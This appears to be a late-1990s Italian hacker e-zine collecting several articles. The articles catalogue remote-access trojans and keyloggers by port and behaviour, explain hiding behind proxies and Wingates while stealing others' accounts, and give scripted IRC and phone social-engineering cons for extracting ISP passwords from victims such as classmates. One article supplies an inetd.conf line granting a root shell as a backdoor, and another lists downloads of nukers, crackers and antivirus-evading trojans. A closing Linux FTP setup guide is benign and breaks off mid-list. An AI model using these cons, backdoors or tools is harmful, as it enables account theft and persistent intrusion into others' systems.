Pensate ad un'amministratore che c'ha messo dieci mesi per sistemare il suo
NT(capita, capita) e di colpo il Sinone 19enne del cavolo mette tutto
all'aria!!!!:))))

Ce ne sono tanti in giro, ce ne sono da sempre ma con il boom del "bo"...
ve ne elenco qualcuno che ho studiato personalmente ed altri per sentito
dire...per informazioni, problemi, commenti etc...nietzsche@angelfire.com

BACK ORIFICE bhe' lo sapete controllate /windows/system....e il regedit
la porta e' udp 31337
ENIGMA e' un setup.exe che da permesso di lettura e scrittura su
una parte di c:
MIRC e' bersagliato, ci sono decine di script che ti fregano ma
basta un occhiata per trovarli
DMSETUP di solito crea diverse directory fasulle, e' uno dei piu'
vecchi e piu'....:)(occio ce ne sono circa 4 versioni)
BACKDOOR si installa con il nome di notepad. exe o notepa.exe
quindi se non vi funziona o ne avete 2...zzi vostri
SYSPPROTECT98 dovrebbe apparire come un setup e crea un file chiamato
system.eo(bha') e funge da server senza alcuna protezione
PICTURE vi fotte la vostra password di accesso a internet(cache) e
la spedisce a un tizio in mail (forse una software house
di antivirus hihihihih)
TELECOMMANDO il server e' una dll da 266k ed il client non l'ho
provato....sorry vi faro' sapere
PHASE-0 e' tipo netbus(.) carino e con molte opzioni per il reg,
il server e' un .exe da 294k
NETBUS E' piu' famoso del BO, le versioni piu' note sono la 1.6, la
1.7 e la 2.0 pro b. Apre la porta tcp 12345 o 12346 ma e'
facilmente riprogrammabile.
REMOTE WIN il server e' RmtEwxS.exe di 262k da le opzioni di est,
SHOUTDOWN reboot e shoutdown, e' possibile settare una password.
GATECRACHER e' completamente scritto in visual basic, il server e'
BUG.exe di 56k, ha le funzioni piu' comuni come apri/chiudi
cd, apri webbrowser, start screensaver, chiudi windows,
cancella file e dir, format, killwin, ... e qualcos'altro....
ICKILLER e' simile al netbus l'interfaccia grafica lascia un po' a
desiderare i comandi sono gli stessi il server si installa
come explorer.exe
DEEP TROAT credo che sia della stessa crew del BO e' facile e molto
simile al netbus a me e' sembrato un po' piu' lento.
WINHELPER altro trojan per mirc riscrive il mirc.ini
NETPATCH non l'ho mai incontrato ma credo che installi un server
ftp sulla porta 31377(BO)
MASTER e' molto simile al netbus, credo che, grazie ad un monitor
PARADISE sul server possa essere usato tranquillamente come RAT
GIRLFRIEND e' molto carino...logga tutti i tasti premuti in ogni
finestra di windows.....quindi anche le password d'accesso
e rimane in ascolto del client sulla porta 21554
ANGEL installa un server ftp che da' completo accesso all'HD
della vittima (credo senza pass)
DEVIL lo sto scaricando ma credo che sia del genere netbus visto
quanto pesa!!
WARTOOL si installa come un explorer.exe ed al riavvio cancella
tutti gli exe e le dll
GJAMER apre la porta tcp 12076 con un server ftp e www

....credo che per ora sia tutto non me ne vengono in mente altri. So' che vi
sapettavate di meglio ma ho detto "for dummies"....a presto e in bocca al
lupo alla zine!!!!

Nietzsche
"o grande sole cosa saresti tu se non ci fossi io su cui risplendere!!!!"

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ PRIVACY QUESTA SCONOSCIUTA ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

La privacy purtroppo e' un optional nel mare burrascoso di internet,
qualsiasi cosa voi facciate la parola d'ordine nei sistemi remoti e'
loggare loggare loggare.....
vediamo un po' cosa fare per "mascherarsi in Internet".
Dovete sapere che gli amministratori di sistema possono, ogniqualvolta
accedete ai loro siti, rintracciare importanti informazioni su di voi....
quale il vostro IP (vera e propria carta d'identita' in Internet) la
pagina da cui provenite, (marketing rules....) il vostro Sistema Operativo,
il vostro browser e in alcuni casi anke l'e-mail.....per non parlare di
alkuni recenti bug scoperti che sembrerebbero in alcuni casi addirittura
permettere al sysadmin di rintracciare la password per accedere alla vostra
posta elettronica.....(!)
Detto questo......la domanda sorge spontanea.....kome restare nell'ombra?
(il perche' sono fatti vostri;)
Il metodo migliore a parere di chi scrive e' quello di stillare un account
...bhe'..non e' molto educativo ed in piu' puo' essere costoso se abitate
ad Aosta e vi dovete collegare a Palermo.....ma in questo modo sarete
sikuri ke le vostre malandrinate resteranno impunite......kome "prendersi"
un account altrui?....bhe'.....questo e' un'altro film...... forse ne
riparleremo un'altra volta..............
dunque passiamo al metodo che io considero un vero e proprio uovo di Colombo:
Il Proxy.
Avrete notato ke fra le opzioni del vostro browser (Netscape, Micro$oft o
altro che sia......) c'e' una simpatica voce che dice appunto "Server proxy"
e' li' ke dovete inserire l'indirizzo del proxy che avete trovato assieme
alla relativa porta....
Ma andiamo per ordine, cosa e' un proxy?...kome lo trovo?
Di solito quando volete vedere on-line una pagina internet quello che
accade e' semplicemente ke il vostro provider kiede al server di
destinazione la pagina in questione e poi ve la spedisce nel monitor.....
(come sono bravo a far le cose facili.....) kosi' pero' i server entrano
in contatto e il richiedente (il nostro provider...) "si presenta" al
server di destinazione lasciando preziose info su di noi.....
utilizzando un proxy invece i 2 server restano divisi perke' il nostro
provider chiede la pagina al proxy....poi quest'ultimo chiede la pagina al
server di destinazione, (lasciando cosi' info su di lui e non su di noi!!!!!)
e infine la manda al nostro server.......
spero di essermi spiegato....il proxy e' un semplice mediatore....ovunque
ci sia possibilita' di utilizzarlo (ci sono proxy abilitati anke per
servizi Gopher,ftp etc. e non solo per http......) abbiamo il vantaggio di
non essere riconosciuti........
Il proxy opera su porte standard quindi e' facile trovarlo usando uno
scanner (prg ke fissata una subnet tipo 194.243.32.X, esamina l'intera
classe e rilascia gli IP ke hanno una determinata porta aperta)esattamente
alle porte 81,3128,8000,8001,8080 (anche se ce ne sarebbero altre.......).
Per trovare un proxy si puo' chiedere molto piu' semplicemente aiuto anke
a www.bikkel.com/~proxy che in questo momento e' on-line e vi fornira'
alcuni indirizzi di proxy free e anonymous.
Per provarvi poi ke siete realmente anonimi, andate su www.rootshell.com
(bhe'...questo sito vi fara' comodo anke per molte altre cose;) o in una
chat ke scopre gli IP dei chatters...se tutto e' andato bene potrete vedere
il vostro IP spooffato (come si dice in gergo).....ovvero il vostro VERO IP
e' nascosto e per esempio nessuno potra' nukkarvi.....
le porte dell'hacking vi sono aperte.........attenti che non siano sbarre
pero'......non andate a formattare gli Hard Disk della NASA o della CIA
perche' il proxy server sara' costretto, su esplicita richiesta, a rilasciare
il vostro IP (se tiene tutti i log naturalmente;)......con quello che ne
consegue....*grin*
comunque visto che siete newbies il pericolo non c'e'......hihihihihihihi
hihi........ma andiamo avanti.
molto simile e' il funzionamento del Wingate che e' un software per
condividere, fra piu' computer, un collegamento ad

  
Internet.....
a differenza del proxy che talvolta abbisogna di password, il Wingate e'
sempre libero e per default neanche logga gli ip di chi si connette...
incredibile no?...
Aprite il vostro Client Telnet e connettevi semplicemente all'IP del Wingate
(porta 23);
da ora in poi per quella sessione telnet avrete l'IP del wingate......
se siete dei veri e propri S.Tommaso della rete provate pure ad aprire da
li' la vostra shell dell'universita' e guardate il vostro IP.....dovrebbe
essere quello del Wingate, se non avete una shell o siete cosi' fuori corso
che il Sysadmin dell'Uni ha deciso di cancellare il vostro account, allora
digitate l'IP di un server seguito da 25 (sarebbe la porta dove volete
connttervi) e poi scrivete "helo" senza virgolette......se il server dispone
di servizio sendmail (quasi tutti...) vi rispondera' con il vostro IP.....
fate la prova con e senza Wingate.....vedrete che portento....hihihihihihihi.
Per trovare un Wingate infine, esistono vari programmi in rete....io uso
Wingate 2.2 e mi sono trovato bene......voi fate come volete......se non
siete neanche capaci di cercarvelo significa che la vostra tastiera e' solo
una macchina da scrivere...lasciate pure perdere l'hacking per ora.......
hihihihihhihi......
e con questo ho concluso, se avete dei commenti, delle domande o vi scappa
da vomitare, fate tutto al mio indirizzo di E-Mail trouman74@hotmail.com

.....IL vostro ALBY.......

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ :::::::::::::::::::::::::: |
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Titolo: Guida di base al S.E ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ di : ElectroRipper ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Scritto il : xx/2/99 ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Pericolo: Û°°°°°°°°° ³
ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ;

ÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Û Û
GUIDA DI BASE Û
Û AL Û
Û SOCIAL ENGEENERING
Û Û
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛ

di
ElectroRipper

Il social engeenering e' un'attivita' utile e divertente, che consiste
nel fingere di essere qualcun altro.
Le applicazioni del social engeenering sono innumerevoli e vanno dalla
ricerca di informazioni riservate al semplice scherzo telefonico...
Se vuoi dedicarti a questa sana e divertente attivita', devi essere :

A) Creativo. Difficilmente troverai gente cosi' scema da credere a una scusa
ancora piu' scema.

B) Veloce. La conversazione potrebbe prendere una strada che non avevi
previsto. In quel caso attaccare il telefono per pensare a un nuovo
piano non fara' che mettere in allarme la vittima, che sicuramente
non caschera' piu' nel tuo tranello. Veloce dunque nel trovare
risposte coerenti e credibili alle domande impreviste, cercando
di riportare, se possibile, la conversazione sulla strada giusta.


Il mezzo piu' comune per praticare il social engeenering e' ovviamente il
telefono, ma anche l'IRC e' terreno fertile per le malefatte di questo
genere.


-IL TELEFONO-


Ecco alcune regole di base se devi usare il telefono :


-Possibilmente non chiamare da casa tua. Meglio una cabina pubblica

-Se sei un ragazzo non tentare di camuffare la voce per sembrare piu' grande :
chiunque con un minimo di intelligenza ti scoprirebbe subito. Molto meglio
usare la tua voce vera, o al massimo modificarla con un camuffa-voce (non
quelli che la rendono semplicemente non identificabile)

-Informati prima di chiamare. Fai un piano A (default) e un piano alternativo
per ogni piega che potrebbe prendere la conversazione (per quelle che riesci
a prevedere. Per le altre, come ho gia' detto, serve solo velocita')

-Se stai parlando con un operatore, e le cose si stanno mettendo male,
puoi far finta di avere molta fretta, e se non ti va bene farai finta
di essere indignato per la sua incompetenza e le sue maniere di trattare
la gente, dicendogli di voler parlare con un suo superiore



-IRC-


Ecco invece qualche dritta per il S.E. in IRC :


-Non farlo su canali che frequenti abitualmente

-Non farlo su canali come hacker.it, ma dove sai di trovare polli

-Non usare il tuo solito nick. Stessa cosa per l'username.

-Usa un abbonamento che non sia quello che usi di solito per collegarti



-ABBONAMENTI GRATUITI-

Ecco varie tecniche di Social Engeenering utili per soffiare le password
di ISP account degli altri.


-METODO 1-

Passo direttamente all'esempio.....

<ElctRipper> Senti, sono nuovo, potresti farmi un piacere ?
<P0110> Certo, spara.
<ElctRipper> Ho notato che quando scrivo la mia password seguita dal codice 266
esce scritto !INVENTATEVI UN MESSAGGIO!BOH!

<P0110> Mah, non so perche'
<ElctRipper> Potresti provare a farlo anche tu ? Poi mi dici se esce anche a te.
<P0110> Ok, ora ci provo. Come si fa il codice 266 ?
<ElctRipper> Tenendo premuto ALT digita 266 sul tastierino numerico e poi rilascia
ALT
<P0110> pippo <---- (questa e' la sua password!)

In pratica inserendo il codice 266 e' come se avesse premuto ENTER,
e vi avesse detto la sua password direttamente. Ovviamente il social
engeenering dovra' continuare anche dopo, altrimenti sospettera' di voi....

<ElctRipper> Allora ?
<P0110> MA CAZZO ! E' USCITA SCRITTA ?
<ElctRipper> No, dico, ti e' uscito quel messaggio ?
<P0110> no
<ElctRipper> Cazzo, ma allora perche' a me esce ? Forse ho uno script di merda ?
Che dici, dovrei cambiarlo ? tu quale hai ?
<P0110> Dynamirc
<ElctRipper> Mi dici dove posso prenderlo ? Gia' non ci capisco niente di IRC,
poi con questo script schifoso.....

Ecco fatto.
Se invece usa linux, al posto di alt-266 potete dirgli di premere ctrl-J dopo
la password.... di norma un utente di linux dovrebbe sputarvi in faccia,
ma oramai questo fantastico os se lo stanno istallando cani e porci, convinti
di sembrare alquanto kewl, e poi non sanno neanche in realta' che cos'e'...
Basti pensare che piu' di una persona mi ha fatto domande del tipo : "A che
serve il programma Linux ?" oppure "Come installo Linux ? Sul cd non c'e'
l'INSTALL.EXE !!!". Mi dispiace, ma vi assicuro che non sto scherzando...
(((((((((((((((((p o v e r a i t a l i a))))))))))))))))))))

-METODO 2-

Trova un pollo, e comincia a parlare con lui. Una volta che siete
diventati 'amici', invitalo su un canale che avrai aperto precedentemente.
Su questo canale, oltre a te, ci sara' un tuo clone, che avrai battezzato
con un nome da bot, tipo <GUARDIANO>,o <UMILESERVO>, o <TROIONA>, fai tu.
Dirai che hai creato questo nuovo canale (oppure, meglio ancora, che era
gia' un canale conosciuto e tu lo hai takeoverato), e hai messo un bot.
Gli chiedi se vuole aiutarti a mantenere il canale, dopodiche' gli dici
che per farsi oppare dal bot serve una password, che gli darai (va bene
qualsiasi cosa). Quando vede che in realta' non lo oppa affatto, farai
finta di restare sorpreso e di pensare all'errore, dato che, come tu dirai,
a te ha funzionato. Dopo un po' ti "ricorderai" che il bot oppa solo
utenti gia' conosciuti, e che quindi deve registrarsi al bot, prima di
poter usare la pass per essere oppato. Se ti chiede come digli che
deve dare un messaggio al bot di questo tipo :

/msg GUARDIANO nick user password

Dove nick e' il suo nick (per allontanare il sospetto di quello che ci interessa
realmente) e user e password sono ovviamente quelli del suo account.
Se lo fara' avrai un nuovo abbonamento. Dopodiche', appena dice la password
stronza che gli hai detto, fagli dare l'op dal tuo clone, in modo che non
sospetti di niente.
A questo punto aspetta che se ne va, dopodiche' leva il clone. Il giorno
dopo lo cercherai e gli spiegherai che avevano ritakeoverato il canale, che
la tin lo ha sgamato con il bot collegato al suo server, o una stronzata simile,
per non farlo sospettare

-METODO 3-

Questo metodo utilizza il telefono, quindi devi prima trovare il numero
di telefono della vittima. Conviene allora cercare la vittima, ad esempio,
tra i propri compagni di classe, dei quali si conosce il numero di telefono.
Dovrai anche conoscere il suo provider e il suo username (facile) dopodiche'
potrai telefonarlo......

ElctRipper - Buongiorno, qui Italia on Line. Vorrei parlare con il titolare
dell'abbonamento numero [inventatiunnumero]
Padre di Giorgio - Uhm, un abbonamento internet, allora e' mio figlio, ora glielo
lo passo.
Giorgio - Pronto ?
ElctRipper - E' l'utente numero (inventati un altro numero) ?
Giorgio - Uhm, non lo so, pero' ho un abbonamento.
ElctRipper - Dunque, aspetti...Allora, il suo username e' <username>, giusto ?
Giorgio - Si
ElctRipper - Stiamo trasferendo i dati degli account su un hard disk piu'
capiente, e quindi stiamo avvisando gli utenti. Lei ci da
l'autorizzazione a trasferire il suo account ?
Giorgio - Ma che cambia ?
ElctRipper - Niente. Anzi, avrebbe un accesso piu' veloce !
Giorgio - Ah, allora si!
ElctRipper - Allora ok. Ora pero' devo essere sicuro che lei e' davvero
l'utente numero (...). Mi dovrebbe dire la sua password.
Giorgio - pippo
ElctRipper - Uhm, non mi sembra
Giorgio - ma sono sicuro
ElctRipper - Ah si, mi scusi, avevo letto quella dell'utente precedente
Grazie di tutto, e buona giornata.


Ecco, un nuovo abbonamento. Fare finta di non ritenere valida la password
e' necessario per un semplice motivo. Se ti ha dato una password falsa
si corregera' subito. Se ti ha dato quella giusta invece protestera' e
tu ti "accorgerai" di aver sbagliato, "controllando" di nuovo la password
e scusandoti dell'errore.

OK ! Per questa volta e' tutto. Ovviamente il social engeenering si usa
per molte altre cose, anche se questa sembra essere l'applicazione piu'
popolare negli ultimi tempi. Ad ogni modo lascio il resto alla vostra
fantasia.

ElectroRipper

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ DOVE E COME METTERE BACKDOOR ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

~~)_(~~] Mettiti una porta in culo ! [~~)_(~~
--- Ovvero dove e come mettere backdoor ---

DISCLAIMER :

I non centro un cazzo se vi mettete nei guai con quello scritto qui,
bhe..sono cazzi vostri .... io non centro nulla..

Materiale di consumo :

1 lt di latte intero
500 gr di nesquik

Saluti : Vecna, Raffiz, |O2|, Harlok, |Killa'|, Bonjo, ]m0f0z[,
Nail^d0d, IHC, Skilled, Ghimlet, BlackS_, |{33p3r, er]B0z0[
e infine mamma Telekazz, grazie di esistere, se non ci fossi
non sapremmo chi fottere :)

Allora allora...
Di che dovevo parlare ???
Bho, non mi ricordo piu', spe che guardo il titolo...
...ah ecco, visto...
Dunque, cosa sono le backdoor, mo ve lo spiego, se lo sapete gia', saltate
questa parte...
Dunque, solitamente una volta entrati in un sistema per mantenere
l'accesso anche se il sysadmin ci sgama l'account rubato si mettono delle
backdoor, che non sono altro che modifiche a file o programmini in
background che ci permetterano di rientrare in quel sistema...

Ok, non mi dilungo di piu', passiamo al sodo...

--] Backdoor nell inetd.conf [--

Questa e' una delle backdoor piu' comuni, consiste nell aggiungere un
servizio nell inetd.con e nel services molto comoda ed efficace, anche se
di facile sgamo.

Ora facciamo cosi', apriamo il file inetd.conf e ci aggiungiamo la
seguente riga...

backdoor stream tcp nowait root /bin/bash bash -i

ora aprite il services ed aggiungete...

backdoor 5454/tcp

ovviamente sostituite le parore backdoor e il numero della porta con
quello che volete voi, magari con un servizio inutile ma esistente, tipo
echo o discard...

Oppure potete fare una copia modificata dell'inetd.conf e del services che
tramite un piccolo script eseguito da un crontab che sostituisce i veri
file con quelli bacati.
Bhe, tutto sta alla vostra immaginazione.

Potete usare anche i rootkit, che non sono altro che demoni installati nel
sistema, che sono stati modificati, come ad esempio un telnet che se
eseguita la login con un user particolare non ci chiede la password...

Bhe, sta a voi decidere ora....

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ QUALCHE MUST HAVE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

-----------------< fritz presents.... >-----------------

:qualche must have

Ecco a voi un po' di link di robina che si rivela sempre utile in
questo campo.
Un paio di considerazioni: i link non sono eterni, un paio di
settimane fa' funzionavano tutti, ma internet si sa che e' il
cantiere piu' grosso che esista, e tutto cambia [o tutto
scorre?... mha'... questione filosofiche, ekkekkazzo! hheheh).
Seconda nota: alcuni progr fanno riferimento al sito TheArgon e
AntiOnline, il primo e' down da una decina di giorni +/-, mentre
il secondo, down pure quello fino a qualche giorno fa', si e'
ripigliato da poco, ma non ho controllato i collegamenti.
In ogni caso, se il link fallisce, sapete il nome del file da
cercare, quindi Altavista e/o FtpSearch :)

Ok.. via con i link:

activex 6, abbastanza indispensabile, credo, per far girare molti
programmi (nb: poco piu' di 6 mega)
-| http://webmaster.hypermart.net/activex602.zip

qualche port scanner
-| http://www.tconl.com/~bullzeye/fastscan.zip
-| http://www.antionline.com/archives/windows/scan/ogre.zip
-| http://www.bullzeye.net/tools/yaps10.zip

un bellissimo ip scanner per trovare free proxy (anonimi?)
-| http://www.netease.com/~jiangyf/down/proxyht263.exe

scanner per trovare server che ancora montano l'amatissimo WinGate
-| http://www.theargon.com/defense/GateScan2.2.exe

uno scanner per beccare __credo__ PC con netbios e condivisioni
-| http://hispahack.ccc.de/programas/smbscanner-eng.zip

verifica se il vostro PC e' infettato da moltissime delle backdoor
in giro
-| ftp://ftp.bashnet.ru/pub/Antinuke/cleaner2.exe

un nuker non fa mai male :-)
-| http://newdata2.box.sk/neworder/aug04/divint3.zip

un paio di telnet un pochino piu' stabili del
c:\windows\telnet.exe
-| http://spap.cac.washington.edu/project/wwwmm/ewan/ewan1052.exe
-| http://www.vandyke.inter.net/pub/CRT/ntcrt23.exe
[io preferisco il secondo, ma e' soggettivo]

finger, host search, pinger, multi-pinger, whois, finger
-| ftp://ftp.euro.net/d4/tucows/files/iptoolb2.exe

e-zine carina carina
-| http://members.it.tripod.de/ZeroCool/NewBies1.zip
[uhmm... pero' se state leggendo questo articolo dubito che questo
link serva a molto... mha'... diciamo che serve per rinfrescare la
memoria ogni tanto eheheh)

avete bisogno per qualche motivo di fare il reboot di un computer
remoto? gli mettete il server e col client lo teminate (si, lo so,
si puo' fare anche con bo, nb ecc, ma un po' di fantasia con le
backdoor ogni tanto! :-))
-| http://www.cheese-reproduction.com/kankan/remote.zip

un paio di utilities carine da parte dello staff di Rhino9 la
prima devo ancora provarla, ma promette bene, la seconda prova gli
exploit classici tipo phf, finger, pwl...
-| http://207.98.195.250/software/chroniclev1.zip
-| http://www.antionline.com/archives/windows/scan/sitescan.exe

key logger, la risorsa estrema :-)
-| http://www.cheese-reproduction.com/kankan/hookdump.zip
-| http://www.Genocide2600.com/~tattooman/trojans/ik97v12s.exe
[io preferisco il secondo, mi sembra meglio fatto, ma l'ho usato
pochissimo per ora hihihihi- ]

un backorifice invisibile agli antivirus (sii... tutti lamah :-))
-| http://www.cheese-reproduction.com/kankan/lmbo120.zip

editors esadecimali
-| ftp://volftp.tin.it/pub/pc/windows/win98/progs/editor/binedit/axe.zip
-| http://www.AntiOnline.com/archives/windows/hex/hexshop.zip

files dizionari divisi per pass da 2 a 8 caratteri
-| http://www.confine.com/wordlists/bigdict.zip

crackers, ovvero avete per le mani un file di pass criptato e non
sapete come affrontarlo
-| http://newdata2.box.sk/neworder/NT/l0phtcrack.zip (x pass di WinNT)
-| http://www.geocities.com/CollegePark/Lounge/1314/pwltool.zip (x
pass di Win95) (dato che il link e' riferito a una pagina di
geocities, e' impossibile indovinare per quanto ancora sara'
attivo. Al massimo si fa una ricerca per il nome del file
pwltool.zip)

ancora backdoor
-| http://www.cheese-reproduction.com/kankan/Ripper.zip
Ripper is a program that can be used to log all of the Dial-Up
Networking accounts on a remote computer. The server is
distributed to the target machine and when execute listens for a
client connection. The Ripper client is used to connect to the
remote computer and the details are retrieved.

intramontabile NetCAT 1.1
-| http://www.l0pht.com/users/10pht/nc11nt.zip

auff... e anche questa e' fatta, sperando che possano servire...

La prossima volta aspettatevi un bell'articolo su trojans e
backdoors, dove trovarli e cosa fanno... un trojan per ogni
occasione insomma eheheheh...

Intanto munitevi di quanto sopra elencato... ciao ciao!

surfin' fritz

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÿÿ ÿÿÿÿÿÿ ÿÿ ÿÿ ÿÿ ÿÿ
øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø
Linux: Come mettere su un ftp anonimo
øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø

Allora, chi di voi ha sempre desiderato di aprire mettere su
un ftp sul proprio computer e non ci e' mai riuscito? Nessuno?
Vabbe', cmq io ve lo spiego lo stesso, visto che con Linux questo e' possibile.

A prescindere dal fatto che decidiate di fornire un ftp anonimo oppure solo
un accesso ftp al sito, dovete comunque svolgere alcune operazioni di configurazione.
Per essere certi che gli utenti non ottengano l'accesso ai file sbagliati,
dovete rendere attivo e in esecuzione il demone FTP (ftpd) e impostare
correttamente i permessi per il filesystem.

Inanzitutto, scegliete un nome per il sito. Per utilizzare l'FTP non e'
indispensabile avere un nome del sito, ma in questo modo le persone vi
troveranno piu' facilmente. La sintassi e' questa:

FTP.NOMEDELDOMINIO.TIPODOMINIO

NOMEDELDOMINIO si riferisce al nome di dominio del server mentre
TIPODOMINIO si riferisce all'estensione DNS (.com , .net etc.)

Quando viene effettuata una connessione FTP, il programma segue una procedura
suddivisa in cinque fasi per ogni connessione.

1. Login: riceve e controlla il nome utente e la password
2. Definire la directory: identifica la directory di partenza
3. Definire la modalita' di trasferimento: definisce la modalita' di
trasferimento da utilizzare
4. Avviare il trasferimento dei dati: permette all'utente di immetere dei
comandi
5. Interrompere il trasferimento dei dati: chiude la connessione

Per permette al server FTP di gestire queste attivita', occorre impostare il
demone FTP, ftpd e configurarlo.

Il demone ftpd deve essere avviato sul server FTP. Questa operazione viene di
solito eseguita avendo un demone inetd che la gestisce e viene avviata solo
quando qualcuno vuole l'FTP.
Inetd osserva la porta del comando TCP (porta 21) in attesa che arrivi un
pacchetto che richiede una connessione e poi quando arriva un pacchetto
attiva in modo dinamico il demone ftpd.

Per essere certi che il demone ftpd possa essere avviato da inetd, esaminate
il file di configurazione di inetd, che si trova in /etc/inetd.conf , per
vedere se e' presente una riga simile alla seguente:

ftp stream tcp nowait root /usr/etc/inetd ftpd -l

Se non c'e', dovrete aggiungerla. Di solito si trova nella maggior parte delle
distribuzioni ma e' anche possibile che la troviate sotto forma di commento
(con il segno # davanti), dunque in quel caso basta che togliate il cancelletto
(che non e' un cancello piccolo ma il segno #)

Per cambiare il comportamento del demone ftpd, potrete aggiungere altre
opzioni come -l
L'opzione -l puo' essere personalizzata per registrare informazioni diverse
sulle attivita' dell'FTP. Se specificate l'opzione -l avrete un file log delle
sessioni. Se, invece, lo specificate due volte, avrete anche un file log di
tutti i comandi. Se lo specificate tre volte, ottenete anche le dimensioni di
tutti i trasferimenti effettuati.

Login

Se avrete intenzione di impostare un ftp dove ogni utente abbia il proprio
login e la propria password, dovrete creare le voci per gni utente nel file
/etc/passwd. Se avete intenzione di non fornire un accesso anonimo, non
create login troppo semplici che chiunque potrebbe utilizzare.

Se avrete intenzioni di offrire connessioni con login anonimo, dovrete creare
un login per l'ID utente anonimo. Questo login potrebbe gia' essere presente e
quindi controllate se esiste nel file /etc/passwd. Potrebbe assomigliare alla
seguente:

ftp:*:400:51:Anonymous FTP access:/usr/ftp:/bin/false

Questa sintassi imposta l'utente anonimo con un login di FTP, un numero utente
di 400, un numero di ID di gruppo e una directory di login. Sarebbe meglio
assegnare gli utenti anonimi a un gruppo separato modificando il file
/etc/group e creando un nuovo gruppo. Poi, potete impostare l'utente FTP per
quel gruppo. Se gli utenti FTP hanno un unico gruppo, diventa piu' facile
impostare i permessi e limitare l'accesso al sistema.

Directory

Nei limiti del possibile, sarebbe meglio avere le sottodirectory degli utenti
anonimi come un filesystem separato, senza alcuna possibilita' per l'utente
anonimo di andare da qualche altra parte tranne che nella sottodirectory
designata a quello scopo. Quindi, dovete creare un filesystem in miniatura
per l'utente FTP anonimo. Ecco come impostare le directory:

1. Create le directory /bin (come /usr/ftp/bin) e copiatevi il comando ls
2. Create la directory /etc e copiatevi i vostri file /etc/passwd e /etc/group
3. Create la directory /lib e copiatevi i file /lib/id.so e /libc.so.xx
4. Create la directory /pub per contenere i file accessibili
5. Create la directory /dev

